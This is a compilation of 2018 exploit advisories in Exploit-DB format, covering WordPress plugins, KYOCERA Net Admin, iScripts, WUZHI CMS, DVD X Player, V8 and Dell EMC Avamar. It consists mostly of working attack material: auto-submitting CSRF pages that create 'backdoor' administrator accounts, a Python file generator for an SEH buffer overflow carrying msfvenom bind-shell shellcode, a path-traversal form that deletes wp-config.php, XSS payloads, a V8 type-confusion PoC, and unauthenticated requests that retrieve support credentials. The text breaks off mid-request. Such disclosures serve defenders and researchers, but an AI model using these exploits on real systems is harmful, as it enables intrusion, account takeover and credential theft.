# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE – Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Software Link:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.6.3
# Tested on: Ubuntu 16.1
#
#Article:
#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/
#
#Video:
#https://www.youtube.com/watch?v=By7kT7UbHVk
#
1 - Description
- Type of user access: any registered BuddyPress user.
- $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped.
- $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped.
2. Proof of Concept
Login as regular user.
1- Log in with BuddyPress User
2 - Access Edit Profile:
http://target/members/admin/profile/edit/
3 - Register data with image:
<http://target/wp-content/uploads/2018/01/buddypress-profile.png>
4 - Change the delete-image parameter in the HTML and save the profile:
<http://target/wp-content/uploads/2018/01/buddypress-profile2.png>
<http://target/wp-content/uploads/2018/01/buddypress-profile3-1.png>
#--
#*Atenciosamente*
#
#*Lenon Leite*
#Vendor: KYOCERA Corporation
#Product https://global.kyocera.com
#Affected version: 3.4.0906
#
#Summary: KYOCERA Net Admin is Kyocera's unified
#device management software that uses a web-based
#platform to give network administrators easy and
#uncomplicated control to handle a fleet for up to
#10,000 devices. Tasks that used to require multiple
#programs or walking to each printer can now be
#accomplished in a single, fast and modern environment.
#
#Desc: The application interface allows users to perform
#certain actions via HTTP requests without performing
#any validity checks to verify the requests. This can
#be exploited to perform certain actions with administrative
#privileges if a logged-in user visits a malicious web
#site.
#
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
#Apache Tomcat/8.5.15
#
#
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#@zeroscience
#
#
#Advisory ID: ZSL-2018-5458
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php
<html>
<head>
<title>KYOCERA Net Admin 3.4 CSRF Add Admin Exploit</title>
</head>
<!-- PoC page for ZSL-2018-5458. Neither form below carries a per-session
     anti-CSRF token or any other proof of request origin, so an administrator
     who is logged in to Net Admin and loads this page has both requests issued
     from their own session. Server-side mitigation: validate a synchronizer
     token (or the Origin header) on addUser.faces and EventControllerServlet,
     and mark the session cookie SameSite. -->
<body onload="exploitrun();">
<!-- Add Administrator -->
<form name="create_user" action="https://192.168.18.133:7443/fwk-web/jsp/addUser.faces" method="POST" target="frame0">
<input type="hidden" name="userType" value="0" />
<input type="hidden" name="addUserForm:loginName" value="backdoor" />
<input type="hidden" name="addUserForm:pw" value="pass123" />
<input type="hidden" name="addUserForm:pwConfirm" value="pass123" />
<input type="hidden" name="addUserForm:role" value="administrator" />
<input type="hidden" name="addUserForm:required_name" value="name" />
<input type="hidden" name="addUserForm:required_email1" value="bd@db.ee" />
<input type="hidden" name="addUserForm:required_role" value="administrator" />
<input type="hidden" name="addUserForm:optional_name" value="Backdoor" />
<input type="hidden" name="addUserForm:company" value="ZSL" />
<input type="hidden" name="addUserForm:department" value="forensics" />
<input type="hidden" name="addUserForm:email2" value="bd2@db.ee" />
<input type="hidden" name="addUserForm:optional_phone" value="123-123-1234" />
<input type="hidden" name="addUserForm:optional_cell" value="321-321-3210" />
<input type="hidden" name="addUserForm:submitHidden" value="true" />
<input type="hidden" name="addUserForm_SUBMIT" value="1" />
<input type="hidden" name="addUserForm:_link_hidden_" value="" />
</form>
<!-- Update Node -->
<!-- Second request, sent by the script only after the first response has
     loaded in frame0. -->
<form name="update_node" action="https://192.168.18.133:7443/fwk-web/servlet/EventControllerServlet" method="GET" target="frame1">
<input type="hidden" name="bname" value="" />
<input type="hidden" name="ts" value="1522690965730" />
<input type="hidden" name="cmd" value="tv_set_cur_node" />
<input type="hidden" name="node_id" value="root.user_administration.administrator.backdoor" />
</form>
<!-- Response targets for the two forms (target="frame0" / "frame1"). -->
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<script>
// Submits create_user immediately, then update_node once frame0 has loaded.
function exploitrun()
{
document.create_user.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.update_node.submit();
document.getElementsByTagName("iframe")[1].onload = function()
}
}
</script>
</body>
</html>
# Exploit Title: iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/easycreate/demo/
# Version: 3.2.1
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9236
# CVE: CVE-2018-9237
1. Description
====================
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" and "Site Title" fields.
2. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In the "edit site" action, inject "><script>alert('2')</script> into the "Site Description" field
3. Save the change, refresh, and the alert pops up.
3. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In the "edit site" action, inject </title>"><script>alert('1')</script> into the "Site title" field
3. Save the change, refresh, and the alert pops up.
4. References
====================
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9236
# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/
# Version: 1.0
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9235
1. Description
====================
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query
parameter to search.php
2. PoC
====================
Request:
GET
/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1;
__utmb=227100805; __utmc=227100805;
__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
PHPSESSID=grh7l3amrvhoapig8ll268l9o4;
messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Mon, 02 Apr 2018 02:58:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 3619
...
<tr>
<td width="76%" class="alt1"><a href="index.php">iScripts Forum</a> ->
<a href="search.php?query="><script>alert('1')</script>">Search</a></td>
<td width="24%" align="center" class="alt1">
<form method="GET" action="search.php" style="display: inline">
<input type="text" name="query" size="12" style="font-size: 10px">
<input type="submit" value="Search" style="font-size: 10px">
</form>
</td>
</tr>
...
3. References
====================
https://pastebin.com/caQW37fY
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes
# PoC file generator for CVE-2018-9128 (DVD X Player Standard 5.5.3.9, SEH-based
# buffer overflow triggered by a crafted .plf playlist). On-disk layout of the
# written file: 608 filler bytes, the 4-byte next-SEH record, the 4-byte SEH
# handler (the pop/pop/ret address noted below), a 100-byte NOP sled, then the
# msfvenom payload from the command recorded above.
# Defender notes: the handler address is taken from EchoDelayProcess.dll, which
# presumably lacks SafeSEH/ASLR (a pop/pop/ret gadget from it is used as the
# handler) -- TODO confirm; shipping that module with those mitigations (and
# DEP) would break this chain. The playlist itself is trivially identifiable
# by its long run of 0x41 bytes followed by non-printable data.
file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
# Filler up to the SEH record.
buffer = "\x41" * 608
# Next-SEH record, then the handler address (see comment on the right).
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
# NOP sled preceding the payload.
nops = "\x90" * 100
# Encoded payload (x86/shikata_ga_nai, 355 bytes per the msfvenom output above).
buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"
# Concatenation order is the on-disk layout described at the top.
file.write(buffer + next_seh + seh + nops + buf)
file.close()
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors do not have the capability to do any of these; however, possible threat actors include:
- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1
# Exploit Title: Plugin Google Drive for WordPress 2.2 – RCE – Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/
# Software Link: *https://wordpress.org/plugins/wp-google-drive/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.2
# Tested on: Ubuntu 16.1
1 - Description
- Type of user access: no login required.
- $_POST['file_name'] is not escaped.
2. Proof of Concept
1 - Send data form:
<!-- PoC request: gdrive-ajaxs.php acts on file_name without authentication
     and, apparently, without normalising the path, so a traversal value
     reaches the delete routine. Mitigation: require a capability check and a
     nonce, and restrict file_name to a basename inside the backup directory
     before deleting. -->
<form method="post"
action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
<input type="text" name="ajaxstype" value="del_fl_bkp">
<input type="text" name="file_name" value="../../wp-config.php">
<input type="text" name="id" value="1">
<input type="submit">
</form>
# - Date Discovery : *11/25/2017*
# - Date Vendor Contact : *12/26/2017*
# - Date Publish : 08/04/2018
# - Date Resolution :
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9926
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
After the administrator has logged in, open the CSRF exploit page.
<html><body>
<!-- PoC page for CVE-2018-9926. The add-admin endpoint processes this POST
     with no anti-CSRF token; the only extra values are fixed query-string
     parameters. Mitigation: a per-session token checked server-side on
     m=core&f=power&v=add, plus SameSite on the admin session cookie. -->
<script type="text/javascript">
// Builds a form from the given input markup and auto-submits it to url.
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
// Fields mirror the add-admin form: role 1 with an empty password.
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='form[role][]' value='1' />";
fields += "<input type='hidden' name='form[username]' value='hack123' />";
fields += "<input type='hidden' name='form[password]' value='' />";
fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />";
var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
- AliasStateInfo alias_info(state, object, source_map);
- state = state->KillMaps(alias_info, zone());
- state = state->AddMaps(object, object_maps, zone());
+ state = state->SetMaps(object, object_maps, zone());
}
...
}
I think the "state->KillMaps(alias_info, zone());" call was accidentally removed. This omission may cause CheckMap instructions to be removed incorrectly.
A PoC demonstrating type confusion:
*/
// Variant 1 (needs --allow-natives-syntax for the %OptimizeFunctionOnNextCall
// call below). Per the analysis above: the loop transitions the elements kind
// of `a`; when `b` aliases `a`, the optimizer no longer keeps the map check
// guarding the final store, which is the type confusion being demonstrated.
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
// CheckMap removed, type confusion
b[0] = 9.431092e-317; // 0x1234567
}
// Training: distinct arrays first, then the same array for both parameters
// so the aliasing case is observed before optimization.
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
// Natives syntax: the next call runs the optimized code.
%OptimizeFunctionOnNextCall(opt);
opt(arr2, arr2);
// Observable effect: the element stored as a raw double is treated as an
// object on property access (see the inline comment).
arr2[0].x // access 0x1234566
Without natives syntax:
// Variant 2: same body as above, but the long empty loop at the end stands in
// for %OptimizeFunctionOnNextCall so no natives syntax is required.
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
b[0] = 9.431092e-317; // 0x1234567
// Force optimization
for (let i = 0; i < 10000000; i++) {
}
}
// Training sequence as in variant 1; the repeated aliasing call replaces the
// explicit optimization request.
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
opt(arr2, arr2);
// Observable effect: see the inline comment.
arr2[0].x // access 0x1234566
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers, enterprise applications, remote offices, and desktops or laptops.
==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================
DELL EMC Avamar fails to restrict access to the Configuration section that lets administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.
=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================
DELL EMC Avamar fails to restrict access to the Configuration section that lets administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve the Online Support Account password in plain text.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192
7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|
2. Server returns credentials in plain text:
HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close
//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]
=========================================================================================================================================================
3. Improper validation of 'DELL EMC Customer Support passcode' allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================
DELL EMC Avamar fails to validate the 'DELL EMC Customer Support passcode' properly, allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to the vendor, this is not a vulnerability but ambiguous functionality.
#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:
Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|
Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close
//OK[1,["true"],0,7]
3. This unlocks the support account and enables the 'Log' download button.
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3, stating that this is ambiguous functionality and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.
04/2018: Vendor assigned CVE-2018-1217 and published the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.2 - Stored XSS
# Date: 31/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.2
# Tested on: CentOS 6.5
# CVE : CVE-2018-9172
# Category : Webapps
1. Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.2 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel, related to the "Uploader Instances"
functionality.
2. Proof of Concept
===========
1. Login to admin panel
2. Open the WordPress File Upload Control Panel. In the Uploader Instances
function, choose and edit an existing instance
3. In Plugin ID field, inject XSS pattern such as:
<script>alert('ManhNho')</script> and click Update button
4. Open a page/post that contains the upload option; the 'ManhNho' alert pops up
3. References
===========
https://www.iptanus.com/new-version-4-3-3-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9172
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator has logged in, open the CSRF exploit page.
<html><body>
<!-- PoC page for CVE-2018-9927. The member-add endpoint processes this POST
     with no anti-CSRF token; the only extra values are fixed query-string
     parameters. Mitigation: a per-session token checked server-side on
     m=member&f=index&v=add, plus SameSite on the admin session cookie. -->
<script type="text/javascript">
// Builds a form from the given input markup and auto-submits it to url.
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
// Fields mirror the add-member form (group 3, model 10, not locked).
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
# Date: 06/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.3
# Tested on: Windows 7 / Cent OS 6.5
# CVE : CVE-2018-9844
# Category : Webapps
Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel, related to the "Edit_Setting"
functionality.
PoC
===============
Request:
POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
HTTP/1.1
Host: 192.168.1.66
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.66/wp-admin/options-general.php?page=
wordpress_file_upload&action=plugin_settings
Content-Type: multipart/form-data; boundary=---------------------
------27678165033834
Content-Length: 906
Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
